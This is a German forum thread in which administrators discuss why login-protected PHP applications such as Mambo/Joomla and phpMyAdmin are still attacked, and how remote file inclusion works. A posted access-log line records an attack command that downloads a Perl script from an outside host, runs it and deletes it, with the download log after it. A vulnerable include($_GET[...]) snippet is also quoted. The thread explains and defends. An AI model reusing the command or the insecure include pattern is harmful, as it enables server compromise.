Serverhack-Statistik - Der wahrscheinlichste Angriff

[rootsvr]

Mir ist nicht klar wie z.B. PHP-Software welche standardmäßig durch einen Login "geschützt" ist für Agriffe ausgenutzt werden kann.

Wenn die Funktionalität per Session/Login geschützt ist, man aber Scripte direkt aufrufen kann die kein loginbenötigen/Fehler haben gehts ganz einfach.

Waren oder sind es fehlerhafte Login Seiten (z.B. bei Horde3)oder vielleicht die eingeloggten User selbst welche die Angriffen durchführen?

Seltener.. eher kann man einzelnen Mambocomponenten mit falschen Paramteren fütternm (per URL) welche dann anderen Schadcode nachladen. Und nutzen (webseiten anschauen) kann man Joomla ja auch ohne eingeloggt zu sein.

Wenn, wie bei phpmyadmin üblich, der Zugang über htacces erfolgt kann den da ein Angriff auf die scripte von phpmyadmin erfolgen. Ich gehe davon aus, dass bei durch htacces geschützten Seiten ein Angriff so gut wie ausgeschlossen ist.

würde ich auch so sehen, htaccess ist aber was anderes als ein login in einer PHP Applikation.

[franki]

Mir ist nicht klar wie z.B. PHP-Software welche standardmäßig durch einen Login "geschützt" ist für Agriffe ausgenutzt werden kann.

Waren oder sind es fehlerhafte Login Seiten (z.B. bei Horde3)oder vielleicht die eingeloggten User selbst welche die Angriffen durchführen?

Wenn, wie bei phpmyadmin üblich, der Zugang über htacces erfolgt kann den da ein Angriff auf die scripte von phpmyadmin erfolgen. Ich gehe davon aus, dass bei durch htacces geschützten Seiten ein Angriff so gut wie ausgeschlossen ist.

Ist schon ein Weilchen her, habe mir aber die Logdateien aufgehoben. Aus der access.log:

Code: Select all

212.92.23.86 - - [24/Jan/2006:04:05:47 +0100] "GET /fsr/xxx/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lynx%20http://www.albanian.ch/anon/sess3023_%20>%20sess3023_;perl%20sess3023_;rm%20-rf%20sess3023*? HTTP/1.0" 200 37137 "-" "Mozilla/5.0" "-"

Und aus der error.log von Apache:

Code: Select all

--04:29:05--  http://www.albanian.ch/anon/sess3023_
           => `sess3023_'
Resolving www.albanian.ch... 70.86.36.66
Connecting to www.albanian.ch[70.86.36.66]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,249 [text/plain]

    0K .......... ......                                     100%   63.60 KB/s

04:29:05 (63.60 KB/s) - `sess3023_' saved [17249/17249]

sh: line 1: kill: ?: no such pid
sh: line 1: kill: R: no such pid
sh: line 1: kill: 21:41: no such pid
sh: line 1: kill: kotfare: no such pid

[tomotom]

Wenn die Funktionalität per Session/Login geschützt ist, man aber Scripte direkt aufrufen kann die kein loginbenötigen/Fehler haben gehts ganz einfach.

Hast Du da ein paar Beipiele?
Gibt es da sowas wie schwarze Listen von einer security Seite?

...einzelnen Mambocomponenten mit falschen Paramteren fütternm (per URL) welche dann anderen Schadcode nachladen. Und nutzen (webseiten anschauen) kann man Joomla ja auch ohne eingeloggt zu sein.

Welche sind das?

212.92.23.86 - - [24/Jan/2006:04:05:47 +0100] "GET /fsr/xxx/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd ... 20sess3023*? HTTP/1.0" 200 37137 "-" "Mozilla/5.0" "-"

Das Beispiel stammt auch einer Seite die ohne Session/Login erreichbar war? Welche Seite war es?

[rootsvr]

???
Worauf willst Du hinaus?

Wenn Du beispielsweise ein Joomla Modul einbindest (siehe z.B. http://www.joomla-downloads.de/componen ... opic,57.0/ ) welches nicht sauber programmiert wurde funktioniert das einwandfrei auf deiner Webseite und zeigt z.B. mit ExtCal einen Calendar an. Dieser betroffenen Version kann aber mittels mosConfig_absolute_path ein anderes Script untergeschoben werden. Eine neuer Version von Calendar behabt das Problem und alles ist gut.
Solche Programmierfehler in Websoftware kann aber überall auftreten. Auf Mailinglisten/seiten wie fulldiscolsure, milw0rm, Bugtraq, Securityfocus bekommt man oft Beschreibungen und aktuelle Exploits.

Was Du mit einer schwarzen Liste machen willst weiß ich nicht, generell kann jede Webapplikation so geschrieben werden das sie ausnutzbar ist. Bevor Du was installierst ist ein "google Name der Applikation/Komponente Problem Exploit Security" angebracht, aber sowas ändert sich ja mit jeder neuen Softwareversion, da ja hin und wieder sogar Fehler behoben werden (bei Software mit großere Verbreitung/Coummunity schneller als bei anderer)

Zur zweiten Frage: Es gibt gab/wird immer wieder Komponenten geben die Fehler haben, welche das aktuell sind weiß ich nicht/werde ich nicht für dich suchen.

Du solltest auch von der Idee abkommen das es Software gibt die immer fehlerhaft bzw immer fehlerfrei ist. es gibt wohl Pakete die nicht mehr gepflegt werden und Fehler dort nicht behoben werden, aber solche sollte man eh nicht einsetzen ohne sich des Problems bewußt zu sein.


Welche Seite das von Franki war? Eine Mambo/joomla-Seite die mittels mosConfig_absolute_path ausgenutzt wurde. Man konnte der Standardseite (index.php) was unterschieben. Wie man z.B. auf http://www.joomla.de/index.php sehen kann ist diese gut zu erreichen ohne das man sich einloggt.

(Diese Lücke ist seit längerem in Joomla/Mambo gefixt.)

Warum Du so auf dem Einloggen rumreitest weiß ich aber nicht.

[tomotom]

???
Worauf willst Du hinaus?
...
Du solltest auch von der Idee abkommen das es Software gibt die immer fehlerhaft bzw immer fehlerfrei ist. ...
Warum Du so auf dem Einloggen rumreitest weiß ich aber nicht.

Ich wollte auf eine Antwort hinaus :-)

Das Bewußtsein, dass es prinzipiell keine sichere Software gibt und Sicherheit auch eine Frage der Zeit ist habe ich. Ich habe nach Beispielen gefragt um mir Details ansehen zu können. Mit "Schwarzer Liste" habe ich mehr nach einer Seite gefragt die noch nicht behobenen Softwarefehler auflisten.

Das Einloggen hat ja die Funktion nur authentifizierte User zuzulassen und dadurch auch Angriffen auf dahinterliegenden Seiten abwehren zu können. Wenn die Loginseite sicher ist und Sessiontracking auf allen Seiten benutzt wird ist auch ein Einbruch schwer möglich. Das wollte ich nur bestätigt wissen. Im Grunde ist klar immer nach aktuellen bugs Ausschau halten...

[rootsvr]

Das Bewußtsein, dass es prinzipiell keine sichere Software gibt und Sicherheit auch eine Frage der Zeit ist habe ich. Ich habe nach Beispielen gefragt um mir Details ansehen zu können. Mit "Schwarzer Liste" habe ich mehr nach einer Seite gefragt die noch nicht behobenen Softwarefehler auflisten.

Es gibt verschiedene Firmen/Institutionen (Securityfocus, Secunia, CERT ...) die teilweise soetwas machen, aber die umfassende alles erfassende Datenbank wo jede mini erweiterung drinnen ist gibt es nicht. Securityfocus und google sollten nen guter Startpunkt sein.

Das Einloggen hat ja die Funktion nur authentifizierte User zuzulassen und dadurch auch Angriffen auf dahinterliegenden Seiten abwehren zu können. Wenn die Loginseite sicher ist und Sessiontracking auf allen Seiten benutzt wird ist auch ein Einbruch schwer möglich. Das wollte ich nur bestätigt wissen. Im Grunde ist klar immer nach aktuellen bugs Ausschau halten...

Aber nicht in jedemfall wird das einloggen benötigt, das o.g. Beispiel funktioniert wunderbar ohne Einloggen, die Variable ist auch so erreichbar gewesen.

Dein Beispiel ist so ein bischen wie: Ich hab ein Auto, das ist immer fest abgeschlossen also kommt niemand rein und klaut mein Radio.
Wenn ein Fenster aber offen ist kann man trotzdem die dein Radio klauen.


Ich hoffe Du verstehst was ich sagen will: ja Sessions sind toll, einloggen ist super, aber pauschal zu sagen deswegen ist es sicher halte ich für falsch und irreführend.

Beispiel:
Du hast ein eine Webseite, die dynamischen Content nachlädt indem sie den Content für den mittleren Frame/Block per include reinholt, je nachdem was Du geklickt hast.
Schlecht programmiert steht dort

Code: Select all

include( $_GET['inhalt'] . ".php" );

Ob Du eine Session verwaltung hast oder die User sich eingeloggt haben (ich geh mal davon aus das deine Webseite erreichbar sein soll und nicht hinter einer Passwortabfrage ala .htaccess versteckt ist) ist irrelevant, nichts hindert einen angreifer daran per paramter ?inhalt=http://bnoserserver.de/script eine script.php von seinem server nachzuladen die auf deinem rechner ausgeführt wird.


Wenn Du sowas meinst wie confixx/phpmyadmin wo man gleich zu Beginn ein Usernamen/Passwort eingeben muß, hast Du recht solange die Sessionverwaltung sauber erledigt wurde und kein Angriff daran vorbei möglich ist. Aber die Realität ist halt anderes, Software kommt von Menschen, Menschen machen Fehler. Auch phpmyadmin und confixx hatten diverse Lücken die sich wohl auch ausnutzen liessen ohne das man sich angemeldet haben mußte.

Eine Session oder ein Login bedeuten also nicht = sicher.

Bei 'normalen' Webseiten wo man Besucher erwartet will man eh nicht jedem ein Usernamen und PW aufdrängen, oder?

[tomotom]

... (Securityfocus, Secunia, CERT ...) ...und google sollten nen guter Startpunkt sein.

Ok, habe schon gebookmarkt. Google auch... :lol:

Dein Beispiel ist so ein bischen wie: Ich hab ein Auto, das ist immer fest abgeschlossen also kommt niemand rein und klaut mein Radio.
Wenn ein Fenster aber offen ist kann man trotzdem die dein Radio klauen.

Das Ziel ist dennoch auch das Fester zu schließen. Es könnte auch reinregnen...

Ich hoffe Du verstehst was ich sagen will...

Du willst sagen:"Eine Session oder ein Login bedeuten also nicht = sicher." Richtig? Um bei Deinem Beispiel zu bleiben. Richtig.

Bei 'normalen' Webseiten wo man Besucher erwartet will man eh nicht jedem ein Usernamen und PW aufdrängen, oder?

Dabei habe ich an Webmailer, phpmyadmin und andere Autos gedacht :lol:

[rootsvr]

Wie gesagt auch Webmailer und phpmyadmin hatten schon Lücken, sicher sind sie nicht nur weil sie (angeblich) zur Benutzung ein Passwort benötigen.

[tomotom]

Wie gesagt auch Webmailer und phpmyadmin hatten schon Lücken, sicher sind sie nicht nur weil sie (angeblich) zur Benutzung ein Passwort benötigen.

Schon klar. Danke für Antworten.